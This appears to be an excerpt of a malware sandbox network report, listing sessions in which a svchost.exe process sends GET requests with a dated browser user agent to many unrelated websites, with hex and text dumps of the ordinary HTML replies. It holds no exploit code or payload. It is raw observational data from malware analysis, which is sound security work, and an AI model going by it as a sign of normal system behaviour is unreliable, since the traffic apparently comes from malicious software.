target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.5	27376	91.229.22.126	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:56 UTC	2267	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: pleszew.policja.gov.pl
2023-03-22 04:45:56 UTC	2283	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:46:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2023-03-22 04:45:56 UTC	2284	IN	Data Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65 Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
2023-03-22 04:45:56 UTC	2299	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
2023-03-22 04:45:56 UTC	2315	IN	Data Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
2023-03-22 04:45:56 UTC	2331	IN	Data Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.5	27407	35.214.171.193	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:56 UTC	2444	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: flamingorecordings.com
2023-03-22 04:45:56 UTC	2444	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding SG-F-Cache: HIT X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT
2023-03-22 04:45:56 UTC	2444	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
2023-03-22 04:45:56 UTC	2460	IN	Data Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69 Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
2023-03-22 04:45:56 UTC	2476	IN	Data Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
2023-03-22 04:45:56 UTC	2492	IN	Data Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
2023-03-22 04:45:56 UTC	2508	IN	Data Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20 Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.5	27422	5.189.171.125	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:56 UTC	2702	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.muhr-soehne.de
2023-03-22 04:45:56 UTC	2735	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:56 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT Accept-Ranges: bytes Content-Length: 51841 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
2023-03-22 04:45:56 UTC	2735	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20 Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
2023-03-22 04:45:56 UTC	2751	IN	Data Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
2023-03-22 04:45:56 UTC	2767	IN	Data Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
2023-03-22 04:45:56 UTC	2783	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.5	27415	75.2.95.235	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:56 UTC	2735	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: ldh.la.gov
2023-03-22 04:45:56 UTC	2786	IN	HTTP/1.1 406 Not Acceptable Date: Wed, 22 Mar 2023 04:45:56 GMT Content-Type: text/html Content-Length: 1346 Connection: close Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET
2023-03-22 04:45:56 UTC	2786	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli
2023-03-22 04:45:56 UTC	2787	IN	Data Raw: 6e 6f 74 20 61 63 63 65 70 74 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: not accept.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	50315	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:31 UTC	65	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:44:31 UTC	65	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:44:31 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:44:31 UTC	66	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.5	27444	172.67.156.49	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3043	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: orlyhotel.com Cookie: django_language=en
2023-03-22 04:45:57 UTC	3172	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 22 Mar 2023 04:45:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0, no-store, no-cache, must-revalidate Expires: Wed, 22 Mar 2023 04:35:50 GMT Content-Language: en Last-Modified: Wed, 22 Mar 2023 04:35:50 GMT X-Frame-Options: SAMEORIGIN Vary: Accept-Language CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ClVBsrMd7t0zQhtOtdo75nGXclBSmZbpfonFtnCJ5VhMmLV73m9m5%2F8IsnFR9UznEuow8WbJORJMUHWt1Drt66uv6ZtLsFZxFULSZIYDjoFyN8ZvTR%2BxQZxIhClqIiLO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9c02e40905e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:57 UTC	3173	IN	Data Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a Data Ascii: 1b<h1>Server Error (500)</h1>
2023-03-22 04:45:57 UTC	3173	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.5	27443	172.67.164.178	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3043	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: clinicasanluis.com.co
2023-03-22 04:45:57 UTC	3176	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: d55e479f054c94814cbc10d217aaa990=5959a3d3d2199a3331172331f86494c2; path=/; HttpOnly Last-Modified: Wed, 22 Mar 2023 04:45:57 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x1mdkWLzgBwFroz0DV7ZaRg0cUwnTR3l%2F2ukM5JskSNG1kO%2BTYwgewBzR2WzoRIUuvNGa1u7vUfzNVxn3uM2seDHFBCzQ9k57P3O%2FWjOuEJ7zNdiGnqQx5BD5cCmDBNxzaxLLNZF2kM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9c04b15bb73-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
